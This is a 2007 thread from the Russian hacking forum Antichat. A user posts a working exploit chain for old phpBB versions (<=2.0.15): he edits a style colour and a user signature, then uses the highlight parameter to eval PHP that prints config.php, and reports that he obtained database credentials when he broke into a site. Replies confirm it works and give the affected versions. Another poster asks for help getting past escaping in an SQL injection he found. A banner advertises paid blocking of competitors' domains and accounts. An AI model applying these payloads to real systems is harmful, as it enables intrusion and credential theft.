Форум АНТИЧАТ - phpbb(highlight)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
phpbb(highlight)

Опции темы

Поиск в этой теме

Опции просмотра

phpbb(highlight)

06.07.2007, 04:25

fly

Постоянный

Регистрация: 15.04.2007

Сообщений: 645

Провел на форуме:
967842

Репутация: 251

Отправить сообщение для fly с помощью ICQ

phpbb(highlight)

Может кому пригодится .
Давно ломал сайт , там стоял старый phpbb . Через базу не смог проделать инклуд. И все остальные способы не помогли. И вот нарыл такой способ.

Идем Administration Panel --> Styles Admin --> Management --> subSilver --> Edit
Затем находим "Font Colour 3" и вместо 6цифр_цвета:

Код:

"'./*"

Далее идем в админский профайл или любой другой юзерский и в поле подписи Signature вставляем:

Код:

"$fd=fopen($phpbb_root_path.'config.php','rb');while(!feof($fd)){echo htmlspecialchars(fgets($fd));}"

Сохраняем!
После этого создаем в любом топике сообщение с текстом:

Код:

"*/var_dump(eval($user_sig)).flush().die().'"

Ну и всем известный способ --- допишем к топику &highlight=1 ---в моем случае я получил пасс и логин от базы.

Последний раз редактировалось fly; 06.07.2007 в 04:27..

06.07.2007, 10:55

NApoleonchik

Участник форума

Регистрация: 04.07.2007

Сообщений: 111

Провел на форуме:
486797

Репутация: 102

Отправить сообщение для NApoleonchik с помощью ICQ

Круто. Сам испробовал - работает!

16.07.2007, 23:49

_SploiT_

Участник форума

Регистрация: 09.05.2007

Сообщений: 120

Провел на форуме:
387630

Репутация: 69

Отправить сообщение для _SploiT_ с помощью ICQ

А версию точно не помнишь?

17.07.2007, 00:14

Basurman

Постоянный

Регистрация: 10.11.2006

Сообщений: 416

Провел на форуме:
5636868

Репутация: 849

Отправить сообщение для Basurman с помощью ICQ

<=2.0.15

10.08.2007, 17:29

che_ha

Новичок

Регистрация: 08.08.2007

Сообщений: 2

Провел на форуме:
8244

Репутация: 0

Всем привет.
Я извиняюсь что не в тему , просто не хотел создавать лишний раз тему.
Нашел на phpBB MS SQL-injection.Могу провести несколько запросов где не исползуються знаки ( '," ) , всегда когда вставлю этот знак ,фильтр перед ним встявляет ( \ ),итоге Incorrect syntax near '\'.

Ничего не смог придумать , может вы знаете какие-нибудь решение ?
СПС.

10.08.2007, 18:38

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Читай статьи.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход